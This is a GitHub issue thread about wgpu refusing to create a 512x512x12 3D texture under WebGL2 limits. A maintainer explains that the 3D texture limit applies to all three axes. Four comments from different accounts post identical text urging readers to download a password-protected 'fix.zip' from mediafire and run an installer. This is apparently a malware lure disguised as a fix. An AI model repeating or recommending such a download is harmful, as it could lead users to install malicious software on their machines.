### ISSUE TITLE
Cannot create a texture 3D with X,Y dimension > 256 whereas webgl2 indicates a max_texture_dimension of 2048 in X,Y

### ISSUE THREAD

**Issue by bmatthieu3** [gfx-rs/wgpu#6163]
**Description**
When running for the browser, and downgrading the limits to webgl2, I have an error message telling me I cannot create a 3D texture with X,Y dimension > 256. I expect it to be conform to the webgl2 limitation indications which seems to be 2048x2048x256

**Repro steps**
You can checkout the example repo here: https://github.com/bmatthieu3/wgpu-sky-rendering
and follow the readme instructions to compile it for the web (using vite)

**Expected vs observed behavior**
I get this error message when I create the 3D texture of a size 512x512x12:

```
wgpu error: Validation Error

Caused by:
  In Device::create_texture, label = 'base HEALPix cells'
    Dimension X value 512 exceeds the limit of 256
```

The X,Y dimension should be <256 which is rather low.

When compiling in native the application runs correctly, it is only on wasm32 that I have this runtime error. 

**Extra materials**

<img width="1509" alt="Capture d’écran 2024-08-26 à 14 32 53" src="https://github.com/user-attachments/assets/a89f57e4-b955-4b1f-809f-794dac4146f3">

**Platform**

Apple M1 Pro, 32 Go, OS: Sonoma 14.4.1
I am using Chrome Version 127.0.6533.122 (Build officiel) (arm64)

**Comment by Superming997** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by projetosgppag** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ChangjingZhang** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by teoxoy** [comment]
> I expect it to be conform to the webgl2 limitation indications which seems to be 2048x2048x256

Are you sure you are checking `MAX_3D_TEXTURE_SIZE`?

Our mapping looks correct:

https://github.com/gfx-rs/wgpu/blob/a93dcb646a6ea040e97950d74e10c757051b35bb/wgpu-hal/src/gles/adapter.rs#L637

**Comment by bmatthieu3** [comment]
@teoxoy - Yes. From webglreport.com I should support max texture 3D of 2048 but wgpu panics telling me that I am limited to creating a 256x256x? 3D texture.

<img width="1624" alt="Capture d’écran 2024-08-27 à 08 16 21" src="https://github.com/user-attachments/assets/66bd4748-1db3-4872-a4d1-4b5cb3e4747a">

**Comment by teoxoy** [comment]
Ah, it doesn't seem you are requesting higher limits than the defaults.

https://github.com/bmatthieu3/wgpu-sky-rendering/blob/dced47fd13f3ab62af446c6e2d2ef7887804ea78/src/lib.rs#L137-L143

**Comment by bmatthieu3** [comment]
I am requesting the webgl2 downlevel limits which sets max_texture size in X and Y to be 2048: https://docs.rs/wgpu/latest/wgpu/struct.Limits.html#method.downlevel_webgl2_defaults

It is the max texture size in Z axis that is limited to 256, not the size in X and Y axis.
That is why I am expecting to be able to create a texture of XxYxZ=512x512x12 because 512 < 2048 in X and Y axis and 12 < 256 in Z axis.
It looks like it interprets somehow the first dimension X to be the 3rd one (i.e. the Z, which is the one limited to a size of 256).

**Comment by teoxoy** [comment]
`max_texture_dimension_3d` applies to all axis of the 3D texture (the WebGL 2 limit behaves the same as well).

**Comment by bmatthieu3** [comment]
Ah, I see. I thought that `max_texture_dimension_1d` and `max_texture_dimension_2d` was referring to resp the X and Y dimension but in fact it refers to all the axis of a 1d or 2d texture (same for `max_texture_dimension_3d` which refers to all the axis of a 3D texture).
